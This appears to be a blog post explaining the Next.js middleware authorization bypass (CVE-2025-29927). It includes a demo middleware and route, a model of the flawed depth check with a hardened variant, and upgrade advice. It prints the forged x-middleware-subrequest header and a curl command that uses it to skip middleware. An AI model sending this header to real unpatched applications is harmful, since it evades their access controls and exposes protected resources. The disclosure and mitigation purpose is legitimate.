A few days ago, researchers disclosed a critical Next.js vulnerability (CVE-2025-29927), highlighting an authorization bypass in the framework’s middleware.
This can allow attackers to completely bypass middleware protections. In other words, if you used middleware.ts, your application is not secure.
Let me explain.
The Attack: How It Works
Next.js uses the x-middleware-subrequest header to track outgoing requests from middleware and prevent infinite loops. The header is added when middleware calls another service, such as an external API. This is designed to stop middleware from calling itself repeatedly, which could waste server resources.
However, an attacker can manipulate this header to make it appear like the middleware is calling itself repeatedly, bypassing the middleware protection. For example, if an attacker sends a header like this:
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
This will trick Next.js into thinking the middleware has already been called five times, allowing the attacker to skip the middleware logic and access protected resources.
Demonstrating the Exploit
Here’s a simple example of how the exploit works in Next.js v15.2.2. Imagine we have middleware that sets a custom header and a route that returns it.
Middleware (src/middleware.ts):
import { NextRequest, NextResponse } from "next/server";

export function middleware(request: NextRequest) {
  // Copy the incoming request headers and add the one the route will read back
  const requestHeaders = new Headers(request.headers);
  requestHeaders.set("x-my-custom-header", "Hello, world!");
  return NextResponse.next({ request: { headers: requestHeaders } });
}
Route (src/app/test/route.ts):
import { NextRequest, NextResponse } from "next/server";

// Route handlers must be named exports matching the HTTP method, not default exports
export function GET(request: NextRequest) {
  return NextResponse.json({
    message: request.headers.get("x-my-custom-header") ?? "Middleware skipped. Exploited!",
  });
}
Normally, the route would return "Hello, world!" like this:
curl http://localhost:3000/test
# => { "message": "Hello, world!" }
But if the attacker adds the malicious header, the middleware is bypassed, and the response changes:
curl -H "x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware" http://localhost:3000/test
# => { "message": "Middleware skipped. Exploited!" }
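To make the mechanism concrete, here is an added example (not Next.js's own code) that models the recursion-depth check described above: a header segment count of five or more for src/middleware causes the middleware to be skipped, so a client-supplied header is trusted blindly. Beside it is a hardened variant that only honours the header when it also carries a secret the server generated itself; the header name x-middleware-subrequest-id, the depth limit and the function names are assumptions for this example, not Next.js internals.

```typescript
import { randomUUID } from "node:crypto";

// Assumed for this example: the "five times" threshold the post describes.
const MAX_RECURSION_DEPTH = 5;
const MIDDLEWARE_NAME = "src/middleware";

// Counts how many chain segments name this middleware.
function middlewareDepth(headers: Record<string, string>): number {
  const chain = (headers["x-middleware-subrequest"] ?? "").split(":");
  return chain.filter((segment) => segment === MIDDLEWARE_NAME).length;
}

// Vulnerable model: whoever controls the header controls the decision,
// so an external client can claim the middleware already ran five times.
export function vulnerableShouldSkip(headers: Record<string, string>): boolean {
  return middlewareDepth(headers) >= MAX_RECURSION_DEPTH;
}

// Hardened model: the server mints one secret per process and attaches it
// to the subrequests it issues itself. A forged header from outside cannot
// carry the secret, so the depth count is never consulted for it.
const SUBREQUEST_SECRET = randomUUID();

export function hardenedShouldSkip(headers: Record<string, string>): boolean {
  if (headers["x-middleware-subrequest-id"] !== SUBREQUEST_SECRET) {
    return false; // not a subrequest this server created: always run middleware
  }
  return middlewareDepth(headers) >= MAX_RECURSION_DEPTH;
}

// Headers the server itself would attach when re-entering the app `depth` times.
export function internalSubrequestHeaders(depth: number): Record<string, string> {
  return {
    "x-middleware-subrequest": Array(depth).fill(MIDDLEWARE_NAME).join(":"),
    "x-middleware-subrequest-id": SUBREQUEST_SECRET,
  };
}

// Constructed sample: the forged header value quoted in the post.
export const FORGED_HEADERS: Record<string, string> = {
  "x-middleware-subrequest":
    "src/middleware:src/middleware:src/middleware:src/middleware:src/middleware",
};
```

Running the forged header through both functions shows the difference: the vulnerable check skips middleware, the hardened one does not, while a genuine server-issued subrequest at depth five is still stopped by both.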
Are you affected?
If you use Next.js and rely on middleware for protecting pages, you may be affected by this vulnerability. Here’s how to tell if you are:
- You use Next.js and rely on middleware for authorization.
- You don’t have additional user authentication checks inside your pages or components.
- You’re not using Vercel or a platform that has patched the issue.
- Your Next.js version is older than v14.2.25 (Next.js 14) or v15.2.3 (Next.js 15).
How to Fix It
- Update Next.js: Make sure you're using v14.2.25 or v15.2.3 or later.
Read more on the official Next.js blog.
Final Thoughts
What are your thoughts on this? How could this have been prevented?